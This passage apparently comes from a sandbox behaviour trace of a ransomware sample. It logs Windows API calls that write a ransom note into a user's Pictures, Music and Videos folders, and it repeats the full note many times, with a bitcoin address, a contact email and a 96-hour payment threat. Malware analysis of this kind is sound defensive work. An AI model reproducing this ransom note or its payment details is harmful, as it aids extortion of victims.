payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", lpUsedDefaultChar=0x0) returned 2498 [0124.514] WriteFile (in: hFile=0x414, lpBuffer=0x242ff88*, nNumberOfBytesToWrite=0x9c2, lpNumberOfBytesWritten=0x19fcac, lpOverlapped=0x0 | out: lpBuffer=0x242ff88*, lpNumberOfBytesWritten=0x19fcac*=0x9c2, lpOverlapped=0x0) returned 1 [0124.515] CloseHandle (hObject=0x414) returned 1 [0124.515] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=39, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Pictures") returned 1 [0124.515] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0124.515] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=39, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Pictures") returned 1 [0124.515] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\How Do I Recover My Files (Readme).txt" (normalized: "c:\\users\\fd1hvy\\pictures\\how do i recover my files (readme).txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.516] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.516] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.516] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x242ff88, cbMultiByte=2498, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", lpUsedDefaultChar=0x0) returned 2498 [0124.516] WriteFile (in: hFile=0x414, lpBuffer=0x242ff88*, nNumberOfBytesToWrite=0x9c2, lpNumberOfBytesWritten=0x19fcac, lpOverlapped=0x0 | out: lpBuffer=0x242ff88*, lpNumberOfBytesWritten=0x19fcac*=0x9c2, lpOverlapped=0x0) returned 1 [0124.517] CloseHandle (hObject=0x414) returned 1 [0124.517] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=13, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Music") returned 1 [0124.517] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0124.517] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=13, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Music") returned 1 [0124.517] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\How Do I Recover My Files (Readme).txt" (normalized: "c:\\users\\fd1hvy\\music\\how do i recover my files (readme).txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.517] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.517] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.517] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x242ff88, cbMultiByte=2498, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", lpUsedDefaultChar=0x0) returned 2498 [0124.517] WriteFile (in: hFile=0x414, lpBuffer=0x242ff88*, nNumberOfBytesToWrite=0x9c2, lpNumberOfBytesWritten=0x19fcac, lpOverlapped=0x0 | out: lpBuffer=0x242ff88*, lpNumberOfBytesWritten=0x19fcac*=0x9c2, lpOverlapped=0x0) returned 1 [0124.518] CloseHandle (hObject=0x414) returned 1 [0124.518] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=14, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Videos") returned 1 [0124.518] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0124.518] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=14, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Videos") returned 1 [0124.519] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\How Do I Recover My Files (Readme).txt" (normalized: "c:\\users\\fd1hvy\\videos\\how do i recover my files (readme).txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.522] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.522] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.522] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your 